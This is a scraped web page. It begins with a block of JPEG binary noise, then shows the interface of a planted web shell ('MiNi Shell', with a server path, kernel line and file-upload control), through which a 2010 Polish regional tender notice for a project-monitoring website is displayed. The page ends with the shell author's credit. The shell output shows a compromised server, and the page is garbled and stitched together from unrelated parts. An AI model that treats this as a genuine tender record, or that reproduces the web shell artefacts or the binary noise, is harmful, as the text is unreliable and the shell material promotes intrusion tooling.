JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100426/116146-N-2010.html

<p class="kh_header"><b>Warszawa: Wykonanie interaktywnego serwisu internetowego służącemu monitorowaniu projektów realizowanych w województwie mazowieckim w ramach Regionalnego Programu Operacyjnego 2007 - 2013 oraz komponentu regionalnego Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 116146 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Mazowieckie , ul. Jagiellońska 26, 03-719 Warszawa, woj. mazowieckie, tel. 022 59 79 100, faks 022 597 92 90, 022 597 96 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mazovia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie interaktywnego serwisu internetowego służącemu monitorowaniu projektów realizowanych w województwie mazowieckim w ramach Regionalnego Programu Operacyjnego 2007 - 2013 oraz komponentu regionalnego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i uruchomienie serwisu internetowego, który w sposób przystępny i atrakcyjny wizualnie zaprezentuje informacje na temat projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego (RPO WM) oraz komponentu regionalnego Programu Operacyjnego Kapitał Ludzki (PO KL) w Województwie Mazowieckim. Zakres przedmiotowej usługi obejmuje:
1) opracowanie dokumentacji projektowej w tym: przygotowanie i zaprezentowanie Zamawiającemu projektu graficznego serwisu internetowego. Serwis zawierać będzie interaktywną mapę Województwa Mazowieckiego z  podziałem na miasta, gminy i powiaty oraz zaznaczonym miejscem realizacji danego projektu dofinansowanego w ramach RPO WM oraz PO KL. Dane do serwisu zostaną dostarczone przez Zamawiającego w formie elektronicznej (w formacie MS Excel lub w innym formacie uzgodnionym z Zamawiającym), a ich źródłem będą m.in. dane pozyskane z Krajowego Systemu Informatycznego (SIMIK 07-13) oraz dokumentacja nadesłana przez beneficjentów RPO WM i PO KL (zdjęcia, kilku minutowe filmy);
2) wprowadzenie danych dostarczonych przez Zamawiającego w formie elektronicznej (ok. 5000 wpisów);
3) utrzymywanie Serwisu na platformie Wykonawcy do momentu jego odbioru przez Zamawiającego;
4) umożliwienie przeprowadzenia testów funkcjonowania serwisu przez Zamawiającego przed uruchomieniem serwisu;
5) instalacja i uruchomienie Serwisu na platformie Zamawiającego pod nadzorem służb Informatycznych Zamawiającego po ukończeniu przedmiotu umowy (Serwisu internetowego) zgodnie z protokołem przekazania, podpisanego przez przedstawicieli Zamawiającego i Wykonawcy;
6) zorganizowanie w siedzibie Zamawiającego prezentacji funkcjonującego serwisu w tym jego funkcjonalności po wykonaniu zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 44.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zamówienia polegające na wykonaniu serwisu z elementami zaawansowanego wyszukiwania, generowania raportów i wizualizacji wyników wyszukiwania w formie graficznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wniosek o dopuszczenie do udziału w postępowaniu;
2) w wykazie wykonanych usług Wykonawca zamieści linki do co najmniej dwóch stron internetowych umieszczonych w wykazie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Ocena spełniania warunków wymaganych od Wykonawców w postępowaniu o zamówienie publiczne zostanie dokonana poprzez analizę dołączonych do wniosku o dopuszczenie do udziału w postępowaniu dokumentów i oświadczeń przy zastosowaniu formuły spełnia/nie spełnia. Jeżeli liczba Wykonawców, którzy nie podlegają wykluczeniu na podstawie art. 24 ustawy oraz spełniają warunki udziału w postępowaniu będzie większa niż określona w sekcji IV.1.2 Zamawiający zaprosi do dialogu i składania ofert Wykonawców, którzy w toku oceny złożonych wniosków o dopuszczenie do udziału w postępowaniu otrzymają najwyższą liczbę punktów. Dokonując oceny złożonych wniosków o dopuszczenie do udziału w postępowaniu Zamawiający zastosuje kryterium: za każde udokumentowane zamówienie określone w warunkach udziału w postępowaniu opisanych w sekcji III.3.2), Zamawiający przyzna jeden punkt. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu i którzy otrzymali najwyższą liczbę punktów będzie większa niż określona w sekcji IV.I.2), Zamawiający zaprosi do składania ofert wszystkich Wykonawców, którzy uzyskali najwyższą punktację.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Koncepcja wizualizacji serwisu internetowego - 30</li>
<li>3 - Koncepcja rozwiązań funkcjonalno-technicznych systemu - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunkow zamówienia otrzymają Wykonawcy zaproszeni do składania ofert.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Opis funkcjonalności serwisu internetowego:
Serwis ma prezentować informacje związane z realizacją wszystkich projektów finansowanych w Województwie Mazowieckim ze środków RPO WM oraz PO KL.
W Serwisie muszą być dostępne co najmniej następujące informacje:
1. rodzaj, ilość projektów, wartość ogółem, wartość dofinansowania krajowego, wkład UE, wkład UE na mieszkańca miast, gminy, powiatu którym przyznano dofinansowanie w podziale na poszczególne priorytety, działania Programu z możliwością filtrowania danych w układzie miasto, gmina, powiat.
2. statystyka wartości projektów według kryterium ogółem oraz ogółem na miasto, gminę, powiat.
3. porównanie informacji na temat projektów realizowanych w 2 wybranych miastach, gminach, powiatach w postaci map. 
4. zestawienie porównawcze miast, gmin, powiatów w których poziom wykorzystania funduszy na 1 mieszkańca  jest najwyższy z województwie, w którym poziom ich wykorzystania jest najniższy.
5. informacja na temat projektów, które Zamawiający uznał za dobre praktyki i które są przedmiotem szerszych działań promocyjnych - wybrane projekty będą opisane nie tylko w sposób statystyczny, ale również w ich przypadku znajdzie się krótki opis zakresu realizacji projektu wraz z materiałem zdjęciowym (max. 10 zdjęć) oraz multimedialnym (1 prezentacja w postaci pliku Macromedia Flash lub 1 prezentacja w postaci pliku MS Power Point - format *.pps lub 1 film wykonany dowolną techniką o maksymalnej wielkości 15 MB). Łącznie przewiduje się objęcie tym punktem maksymalnie 200 projektów.
6. dane dotyczące projektów: tytuł projektu, wartość dofinansowania, nazwa beneficjenta i jego forma prawna, nazwa priorytetu i działania, całkowita wartość projektu, dane teleadresowe, podziału na projekty kluczowe lub w trybie konkursowym.
7. lista beneficjentów.
8. mapa drogowa województwa mazowieckiego z podziałem na kategorie dróg: krajowe, wojewódzkie, powiatowe, gminne.
9. bezstratny, bezbłędny i w pełni uporządkowany import przekazanych przez Zamawiającego danych oraz sklasyfikowanie i przetwarzanie do postaci umożliwiającej realizowanie funkcjonalności, o których mowa w punktach od 1 do 7.
10. administracja za pomocą Systemu Zarządzania Treścią (ang. Content Management System).

Informacja, do której ostatecznie dociera użytkownik powinna być przedstawiona w dwojaki sposób:
1. wizualny (mapa województwa > mapa powiatu > mapa gminy > mapa miasta) - graficzny sposób przedstawienia informacji od kryterium geograficznego do kryterium tematycznego. Jest to mapa Województwa Mazowieckiego, na której można wybrać poszczególny powiat następnie w nim gminę, miasto. Po wybraniu powiatu, kontur Województwa nie jest już widoczny, a po wybraniu gminy niewidoczny staje się kontur powiatu. Na mapie zaznaczone jest natężenie realizowanych projektów w formie kolorowych kropek lub innych znaków graficznych. Kontur przesuwa się do góry, a u dołu pojawia się spis nazw projektów z nazwami beneficjentów i ich wartością oraz łączna wartość projektów dla tego obszaru . Spis ten może być przez użytkownika przefiltrowany w układzie wartości projektów (najmniejsza wartość oraz największa wartość) jak i w zakresie tematycznym (projekty wodnościekowe, kanalizacyjne, kultura, przedsiębiorczość, edukacja, sport, turystyka itd.). Po kliknięciu na podlinkowaną nazwę projektu użytkownik dociera do właściwego, szczegółowego i ostatecznego opisu projektu, w którym zawarte są następujące kryteria:
a) nazwa projektu,
b) forma prawna beneficjenta,
c) obszar realizacji projektu (powiat, gmina, miasto),
d) nr i nazwa Priorytetu, działania w ramach Programu,
e) całkowita wartość projektu,
f) wartość wkładu wspólnotowego.
Informacja szczegółowa dotycząca poszczególnych projektów musi być przedstawiona w czytelny, przejrzysty i  atrakcyjny graficznie sposób (tabela lub kilka zakładek prezentujących poszczególne kryteria). W tym celu należy stworzyć odpowiedni szablon, składający się z wielu, odpowiadających poszczególnym kryteriom, komórek do uzupełnienia. W przypadku szablonów dla projektów, które zostały uznane za dobre praktyki (projekty promocyjne), powinna istnieć dodatkowa opcja rozbudowanego opisu projektu, dołączenia materiałów zdjęciowych do przeglądania oraz multimedialnych/filmowych do pobrania.
2. poprzez wyszukiwarkę - sposób przedstawienia informacji od kryterium tematycznego do kryterium geograficznego. W pobliżu mapy (województwa i powiatu) należy stworzyć link do złożonej wyszukiwarki, w której można kojarzyć kryteria geograficzne z tematycznymi. W ten sposób użytkownik dowie się, ile w wybranym przez niego powiecie realizowanych jest projektów typu, jaki określił w opcjach wyszukiwarki. Opcjami do wyboru w wyszukiwarce są następujące kryteria:
a) obszar realizacji projektu (powiat, gmina, miasto),
b) nr i nazwa Priorytetu działania,
c) wartości projektu większej- mniejszej od wartości  zdefiniowanej przez użytkownika,
d) typ projektu (np. projekty wodnościekowe, kanalizacyjne, kultura, przedsiębiorczość, edukacja, sport, turystyka itd.),
e) projektu kluczowe i konkursowe.
W ten sposób użytkownik dociera do spisu nazw wszystkich projektów, ich wartości i nazw beneficjentów oraz łącznej wartości projektów w wybranym powiecie lub gminie, ograniczając się do zaznaczonego przez siebie kryterium geograficznego (jest to opcja niedostępna dla mapy całego województwa). Podobnie jak w przypadku przemieszczania po mapie projektów, po kliknięciu na podlinkowaną nazwę projektu użytkownik ostatecznie otrzymuje właściwy 
i szczegółowy  opis projektu.

Wymagania poza funkcjonalne
Serwis musi posiadać system zarządzania w zakresie bezpieczeństwa zapewniający kontrolę i identyfikację użytkowników mających dostęp do edycji zawartych w Serwisie treści oraz dający możliwość wykonywania kopii archiwalnej i gwarantujący bezpieczeństwo danych.
Wymagania techniczne
1. Serwis musi zapewniać nieprzerwaną dostępność i wydajność.
2. Wieloplatformowość.
3. Współpraca z wieloma technologiami i przeglądarkami (Ms Internet Explorer 5 i nowsze, Netscape, Mozilla, Opera, Safari, Firefox).
4. Baza danych musi być przygotowana do przechowywania i obsługi danych do opisu 50 000 projektów.
5. Dane do opisu projektów przekazywane będą Wykonawcy w formie elektronicznej w postaci arkusza kalkulacyjnego MS Excel (lub innego uzgodnionego z Zamawiającym). Materiały do opisu projektów, które zostały uznane za dobre praktyki (projekty promocyjne) będą przekazywane Wykonawcy w formie elektronicznej w postaci arkusza kalkulacyjnego MS Excel, plików tekstowych (*.doc), plików graficznych (*.jpg, *.gif, *.tiff), prezentacji w postaci pliku Macromedia Flash lub pliku MS Power Point oraz pliku video (w formacie *.mpeg, *.avi).
6. Narzędzie do importu danych musi być przystosowane do automatycznego pobierania danych przekazywanych w postaci arkusza kalkulacyjnego MS Excel.
7. Zamawiający planuje utrzymywanie serwisu w ramach własnych zasobów. Utrzymywanie ma dotyczyć zarówno sprzętu, na którym serwis będzie zainstalowany, jak i infrastruktury sieciowej i dostępu do Internetu. 
8. Zamawiający nie planuje zakupu narzędzi wykorzystywanych do utrzymywania serwisu, tj. baz danych, serwera, aplikacji, systemu operacyjnego. Koszt utrzymania tych licencji musi zawierać się w ramach oferty świadczenia usługi hostingowej.
9. Zamawiający utworzy domenę wkiep.mazovia.pl w ramach własnych zasobów.
10. Technologia, która będzie wykorzystana do budowy serwisu musi charakteryzować się następującymi możliwościami i cechami:
a) zaawansowane wyszukiwanie wielokrotne,
b) zaawansowane funkcje prezentacji,
c) automatyczna archiwizacja danych,
d) niezawodny, automatyczny system archiwizowania serwisu i tworzenia kopii na nośnikach zewnętrznych.
11. Generowanie i udostępnianie Zamawiającemu statystyk odwiedzin serwisu w wyszczególnieniem okresów dziennych, tygodniowych oraz miesięcznych.
12. Udostępnienie Zamawiającemu serwisu na okres 7 dni przed upublicznieniem w celu sprawdzenia poprawności funkcjonowania i dokonania odbioru dzieła przez Zamawiającego, oraz naniesienia poprawek przez Wykonawcę.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 10:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Mazowieckiego w Warszawie, ul. B. Brechta 3, 03-472 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Środki przeznaczone na sfinansowanie przedmiotowego zamówienia pochodzą ze środków dotacji celowej w ramach Priorytetu VIII Pomoc techniczna Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007 - 2013 oraz w ramach Priorytetu X Pomoc techniczna Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com